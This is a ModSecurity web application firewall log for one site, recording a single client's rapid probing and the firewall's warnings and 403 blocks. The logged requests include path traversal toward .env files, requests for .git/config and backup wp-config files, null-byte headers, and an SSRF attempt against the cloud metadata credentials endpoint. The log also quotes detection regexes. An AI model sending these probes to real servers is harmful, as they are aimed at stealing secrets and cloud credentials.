[Tue May 12 04:39:06.672391 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
[Tue May 12 04:39:06.672752 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
[Tue May 12 04:39:06.755650 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.166:50346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxwgpmE1yW0glLdgfDgAAAMU"]
[Tue May 12 04:39:06.809131 2026] [security2:error] [pid 1730207:tid 1730223] [client 45.148.10.166:49910] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxTue9Sp-pIv_Bb61EAAAAU4"]
[Tue May 12 04:39:07.460113 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:50404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxwgpmE1yW0glLdgfDwAAAMw"]
[Tue May 12 04:39:07.502403 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.166:56966] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKSywgpmE1yW0glLdgfFAAAAMo"]
[Tue May 12 04:39:07.502593 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.166:56966] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKSywgpmE1yW0glLdgfFAAAAMo"]
[Tue May 12 04:39:07.512578 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.166:49974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxBfeipD4uoG21FoicgAAABQ"]
[Tue May 12 04:39:07.512773 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:49990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxM1tk6y7yBJLpJopewAAAJc"]
[Tue May 12 04:39:07.513483 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.166:50402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxxfeipD4uoG21FoiegAAABg"]
[Tue May 12 04:39:07.517098 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:07.689136 2026] [security2:error] [pid 1825179:tid 1825212] [client 45.148.10.166:50438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSx9r1yOh9TvizeziPrQAAAE4"]
[Tue May 12 04:39:08.029023 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:50186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxM1tk6y7yBJLpJopfgAAAII"], referer: https://tchatbooster.com/.env.old
[Tue May 12 04:39:08.084244 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.166:50152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxdr1yOh9TvizeziPqgAAAEE"], referer: https://tchatbooster.com/.git/config
[Tue May 12 04:39:08.095710 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.166:50442] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxxfeipD4uoG21FoiewAAAAo"]
[Tue May 12 04:39:08.160286 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:50454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSyAgpmE1yW0glLdgfEQAAAMY"]
[Tue May 12 04:39:08.213165 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxBfeipD4uoG21FoicQAAAAw"]
[Tue May 12 04:39:08.854008 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:50356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxzue9Sp-pIv_Bb61GQAAAUU"]
[Tue May 12 04:39:08.954586 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:50068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxRfeipD4uoG21FoidQAAAA8"], referer: https://tchatbooster.com/.git/HEAD
[Tue May 12 04:39:08.959084 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.166:50524] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKSzDue9Sp-pIv_Bb61IQAAAUA"]
[Tue May 12 04:39:08.959841 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.166:50524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKSzDue9Sp-pIv_Bb61IQAAAUA"]
[Tue May 12 04:39:09.269251 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.166:50120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxBfeipD4uoG21FoicAAAAA0"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:09.271154 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:50082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxc1tk6y7yBJLpJopgQAAAIM"], referer: https://tchatbooster.com/wp-config.php~
[Tue May 12 04:39:09.273511 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:09.353146 2026] [security2:error] [pid 1730207:tid 1730233] [client 45.148.10.166:50374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxzue9Sp-pIv_Bb61GAAAAVg"]
[Tue May 12 04:39:09.943764 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:57062] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSzRfeipD4uoG21FoigwAAAAc"]
[Tue May 12 04:39:09.943849 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:57062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSzRfeipD4uoG21FoigwAAAAc"]
[Tue May 12 04:39:09.944054 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:57062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSzRfeipD4uoG21FoigwAAAAc"]
[Tue May 12 04:39:09.944958 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:09.945034 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:09.945082 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:09.945357 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:09.945412 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:09.945926 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:09.954308 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:49866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxHo6NvB9WXx5V-6eswAAAQw"]
[Tue May 12 04:39:10.493884 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKSztr1yOh9TvizeziPuQAAAEs"]
[Tue May 12 04:39:10.494108 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKSztr1yOh9TvizeziPuQAAAEs"]
[Tue May 12 04:39:10.660947 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.166:56966] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSywgpmE1yW0glLdgfFAAAAMo"]
[Tue May 12 04:39:11.031312 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.166:50248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxggpmE1yW0glLdgfDQAAAME"]
[Tue May 12 04:39:11.802604 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
